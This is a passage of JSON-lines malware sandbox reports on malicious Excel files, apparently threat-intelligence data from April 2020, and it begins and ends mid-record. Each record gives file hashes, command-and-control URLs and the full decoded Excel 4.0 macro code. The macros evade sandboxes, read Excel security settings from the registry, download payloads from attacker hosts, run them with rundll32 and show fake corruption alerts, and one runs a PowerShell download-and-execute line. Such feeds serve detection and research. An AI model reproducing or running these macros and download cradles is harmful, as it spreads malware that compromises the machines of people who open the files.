,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JomJZASCq5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"022d0eb6387709ba90d3b7d515b539a40c4d6c0119f9fb3baa7604f1fd1b18d0"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"022d0eb6387709ba90d3b7d515b539a40c4d6c0119f9fb3baa7604f1fd1b18d0","filesize":225280,"md5":"fd468bb6b7fc608abcd8ee790bc94363","sha1":"32e6fc1ed6f048e60d11e7ec73270f3794158d19","sha256":"022d0eb6387709ba90d3b7d515b539a40c4d6c0119f9fb3baa7604f1fd1b18d0","sha512":"461c40ed8b694a662d1d68eacc9a89e02b09259cf02a313d776d05eedf237fb0516eef9c77e42e7286a4bc6334283265348745601d128e4068c71944118c86ff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"022d0eb6387709ba90d3b7d515b539a40c4d6c0119f9fb3baa7604f1fd1b18d0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8EPpdhkILf\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0235f35e38c8b9ede2e125c0cad07aac15ebb99c6dd22bcdb9dcf206dcdd64a4"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"0235f35e38c8b9ede2e125c0cad07aac15ebb99c6dd22bcdb9dcf206dcdd64a4","filesize":185344,"md5":"5de96a1891739aadc27555154a6a4688","sha1":"5ed0ebbe130d84de35ab8d0b8bcaacf7ec8308ba","sha256":"0235f35e38c8b9ede2e125c0cad07aac15ebb99c6dd22bcdb9dcf206dcdd64a4","sha512":"f4bffb67f7b64dd024a1855a40a877ac2cd0c044fa3aaef055bad8214a9503477969e993b6b78b94c7d539c3d0bad7332db48f8bf81b44dfbf21df3c10a0bb20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0235f35e38c8b9ede2e125c0cad07aac15ebb99c6dd22bcdb9dcf206dcdd64a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"024184c195d07b74f726553434302ba513a4faa152f8e5130b75d1606fdb8fbc"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"024184c195d07b74f726553434302ba513a4faa152f8e5130b75d1606fdb8fbc","filesize":103941,"md5":"9360fc8efeb49269f7b4f863e486affe","sha1":"168dde4478419822233fa593e78ed394c9ddec9f","sha256":"024184c195d07b74f726553434302ba513a4faa152f8e5130b75d1606fdb8fbc","sha512":"640743f7fd302a6b3e61a69c1bacb2813e9b32da53f0070362dcc220f7865b535543b90850fa0c3436507c6b7c2d8fff23d47d58b58975dd3f4463a930b88f9d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"024184c195d07b74f726553434302ba513a4faa152f8e5130b75d1606fdb8fbc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0242e85555d4c18777ba0d6d6a560b132f1a1cb042c07dd17205c07aea29d232"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"0242e85555d4c18777ba0d6d6a560b132f1a1cb042c07dd17205c07aea29d232","filesize":206336,"md5":"b05206b8e1d9d12b46aa2b3e5c7a654d","sha1":"2f88438625491f8d8ddf87f538d583e19cd5ad56","sha256":"0242e85555d4c18777ba0d6d6a560b132f1a1cb042c07dd17205c07aea29d232","sha512":"a1749b1b4118de68c0a00b708fc11a84b0ce7680ebdefa6f35327eb82b7f3bd751baa5a76dde7fbfaca2a1a4f02468770d4717879c4a1de2038c7d74e2864a2a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0242e85555d4c18777ba0d6d6a560b132f1a1cb042c07dd17205c07aea29d232.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"H2gsveao0b\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"024ebaf41ecfaf5329bf4b2b0247e98a9b58dae277e3bd1b777be39c111b891f"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"024ebaf41ecfaf5329bf4b2b0247e98a9b58dae277e3bd1b777be39c111b891f","filesize":141312,"md5":"9997df7f11c4153e5bf3460b7940a605","sha1":"1d418216d1b0c9a15a52992f0d1ee37dd6ec5979","sha256":"024ebaf41ecfaf5329bf4b2b0247e98a9b58dae277e3bd1b777be39c111b891f","sha512":"a1df297cdb2c0a829deb76c2af40d813ab76338eb6e9e761cc0c12af9bffebfbec7c4c336eaa2927c4efb80fa6366fa567cbb457d7d8dcac0af4fff7523ea0df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"024ebaf41ecfaf5329bf4b2b0247e98a9b58dae277e3bd1b777be39c111b891f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"EN2qvDsqSt\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02677b53065965e0e20c94063953c2565267425efbf874bac53ac2e3101de3a7"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02677b53065965e0e20c94063953c2565267425efbf874bac53ac2e3101de3a7","filesize":116224,"md5":"c32bfee736cf737bb3771d16b7f845a7","sha1":"efdadb2d615bd5a5532b7fb6ac1c55cefdc1006f","sha256":"02677b53065965e0e20c94063953c2565267425efbf874bac53ac2e3101de3a7","sha512":"50f1ae63d7e7cc1ef937e3fce15df272aff3c6fec6850fd1d2299e566ac30b131767104f5ee36562835f91032c867949e0c248c44fcadb3a48eabb823a4233b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02677b53065965e0e20c94063953c2565267425efbf874bac53ac2e3101de3a7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PGmZXtYLkl\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02727e695cc2753397647b29ce0abb3cdbedd3bc84ce826853e014ec9c5237ec"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02727e695cc2753397647b29ce0abb3cdbedd3bc84ce826853e014ec9c5237ec","filesize":141824,"md5":"9e2961efb5f64ace0cd63997e5f7d262","sha1":"aaceb5d55d18ef5ba147d61282ca9c3213d9c9bd","sha256":"02727e695cc2753397647b29ce0abb3cdbedd3bc84ce826853e014ec9c5237ec","sha512":"7f8245ca8698d0af83f6e9d1262ad4e54bc6ea9c6c6a74d8451ae4fc58e408ff44126bcbf97ce6d494e26ffb84c27d85b4f79d1b1e75ea0caee9e51fa21652fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02727e695cc2753397647b29ce0abb3cdbedd3bc84ce826853e014ec9c5237ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"aniRQCjzqS\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02775a11b81070202424f5fd0a579197c927f2d7f2c87637d44653cb644792ef"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02775a11b81070202424f5fd0a579197c927f2d7f2c87637d44653cb644792ef","filesize":167936,"md5":"b72ad153549f24b86815c60d720a4218","sha1":"b322af82147e77c138d280c0d98e24f802a2abe5","sha256":"02775a11b81070202424f5fd0a579197c927f2d7f2c87637d44653cb644792ef","sha512":"4ad26277da50c756c6dadb69259d0bd0c932c03f505e04e02fa7ec2c6f76c31f23084735a3c701f986adc534248a9abc2fd120df940151d96ad0a1e295bde5cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02775a11b81070202424f5fd0a579197c927f2d7f2c87637d44653cb644792ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Slrfzb3CDq\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"028ef2c173208b8dee4878cb12c19811c5034914eba32ff74a6448d94a5a6e2f"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"028ef2c173208b8dee4878cb12c19811c5034914eba32ff74a6448d94a5a6e2f","filesize":206336,"md5":"323b42f8555277c9a9501c5a7b57767c","sha1":"28afbb181e1201ef8a39abe962feb4c2cbf36bc6","sha256":"028ef2c173208b8dee4878cb12c19811c5034914eba32ff74a6448d94a5a6e2f","sha512":"9028815e189c3690b532aa2f6b1637c4441a81cfe675dba38b63801a707f06cf73d7fad70d4685378c5327f443d63d48d54d046493f3b83584dcb5e82e448ebb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"028ef2c173208b8dee4878cb12c19811c5034914eba32ff74a6448d94a5a6e2f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WVE8CmStzY\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"028f196cfba3f6394251da76e6a6e143517fd2016c568b81a485a3338f904eec"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"028f196cfba3f6394251da76e6a6e143517fd2016c568b81a485a3338f904eec","filesize":185344,"md5":"34a818e353005028135db48ac76577cd","sha1":"98bb1c3abafe8fb77ccb1dc6bf4bb3e9e916ae03","sha256":"028f196cfba3f6394251da76e6a6e143517fd2016c568b81a485a3338f904eec","sha512":"bf00ef897cbe2e17dcd57df7e17c292ad9a2468df02d8f2d46f3acb36dd4d2023cbae7d15537645a6d52f8fb29675dd1704725195fcd2123b7e84e19607f4c27","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"028f196cfba3f6394251da76e6a6e143517fd2016c568b81a485a3338f904eec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02adcf788aac8fcbe7aede3ed21f57db9d58b12384a10d484222511fd5feb066"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02adcf788aac8fcbe7aede3ed21f57db9d58b12384a10d484222511fd5feb066","filesize":153654,"md5":"93f285a4b6e5d4bd93afa75ff2dfb75b","sha1":"4a5cee6f59212baa90f195cc0288c9d281e014fb","sha256":"02adcf788aac8fcbe7aede3ed21f57db9d58b12384a10d484222511fd5feb066","sha512":"1ddff28e1f7ec2f91171b6f9d0c4f42e666ca854b74e05a67930b2333304f9813b5fd780ac77ce83d0876d4048ccb1d1940fba7376dbcdcf4be22fbfb62c7e4f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02adcf788aac8fcbe7aede3ed21f57db9d58b12384a10d484222511fd5feb066.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nEXEC(\"powershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://serpentrising.com/wp-admin/css/d')\")\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02bd942dd52dd45bc35a39a7dab194f4a731f696cbeb92dfa59b307d40fed668"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02bd942dd52dd45bc35a39a7dab194f4a731f696cbeb92dfa59b307d40fed668","filesize":209408,"md5":"1d31dc636bb4813dd67b1493926656da","sha1":"25e184d0de3e5a92065e65a127278142fb6b4601","sha256":"02bd942dd52dd45bc35a39a7dab194f4a731f696cbeb92dfa59b307d40fed668","sha512":"3fa33b90ae85ef8fc6c36da8f6626b360fea7f6367cf28040a8bb55f1849e71ea2391825117f107540ac1d8ac134dfd14202ca09e150de139ae4d00b2b546313","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02bd942dd52dd45bc35a39a7dab194f4a731f696cbeb92dfa59b307d40fed668.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nTskpB70rY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02c45db2363f6c41483b3913f19ee4f5cf3d0c8cd8ab330a136927039ed70045"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02c45db2363f6c41483b3913f19ee4f5cf3d0c8cd8ab330a136927039ed70045","filesize":141824,"md5":"7c5a12496dc64b2846f8ebdb96745a60","sha1":"3f033f3fc5cb29173e22babae0b0bc5888d53de1","sha256":"02c45db2363f6c41483b3913f19ee4f5cf3d0c8cd8ab330a136927039ed70045","sha512":"6eaefe276ed53a0fabee064f0eb6c34febbf7de56b52a23734dc47426177b446d3a42a1cd77c9b82d64ebc34ac3988363f33dff91d116b011aefbf33df7206eb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02c45db2363f6c41483b3913f19ee4f5cf3d0c8cd8ab330a136927039ed70045.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"v1PiY6cZk7\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02c60071120abeb117532a5ed8b51bcf4204c0e120530b52d23d4afd6edc7836"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02c60071120abeb117532a5ed8b51bcf4204c0e120530b52d23d4afd6edc7836","filesize":185344,"md5":"5acd4dc5512287d7de7625a13c436439","sha1":"f596cd458d9caa9e28986f8145a2e12597261e9f","sha256":"02c60071120abeb117532a5ed8b51bcf4204c0e120530b52d23d4afd6edc7836","sha512":"f1ee0230409100f12c31d48cdb15f3c762a54d8e1438e747927050ed67b1aea81e7856969732988d7d979d3ed91f696846d8f722310f552b80ae898b215bab1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02c60071120abeb117532a5ed8b51bcf4204c0e120530b52d23d4afd6edc7836.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02e3aa62d18f5f3b61712c27d467272ea4970ae31d18eef70b5badc738aedfe6"},"analysis":{"reported":"2020-04-09T16:14:39Z","score":10},"files":[{"filename":"02e3aa62d18f5f3b61712c27d467272ea4970ae31d18eef70b5badc738aedfe6","filesize":132608,"md5":"bfa7662a6b7f1850eaf5397dc506bfbc","sha1":"7f1a62260945c31f2d9f6461c3b119f41c138bf3","sha256":"02e3aa62d18f5f3b61712c27d467272ea4970ae31d18eef70b5badc738aedfe6","sha512":"a99e7c33e2e0e7fa8e3ed1d4a45f36d71718fb7cbe5c17ffc9489b66d1c361977b046235659256f39b6f4ac9f199017de00c9040d87fa5f353c1c0214e2a028b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02e3aa62d18f5f3b61712c27d467272ea4970ae31d18eef70b5badc738aedfe6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kov08YPWSj\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"02eddef5615954c7513fa8c783c6ac6af3dac9ea3e46daa482d6659dbdf84d77"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"02eddef5615954c7513fa8c783c6ac6af3dac9ea3e46daa482d6659dbdf84d77","filesize":144384,"md5":"a9848320237d5bc012cb5e33c0f75983","sha1":"3fbbda9be6fd9882da9adace6a0ef4439e4c111e","sha256":"02eddef5615954c7513fa8c783c6ac6af3dac9ea3e46daa482d6659dbdf84d77","sha512":"36ef59a458d6ab2eec98a4192ad33694be829c808f20850e2aa7774de45e17f3641ac118169dcc5ee9ccc99060a0790728bcd51ec696daec4e17edb1d30fc7f2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"02eddef5615954c7513fa8c783c6ac6af3dac9ea3e46daa482d6659dbdf84d77.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM 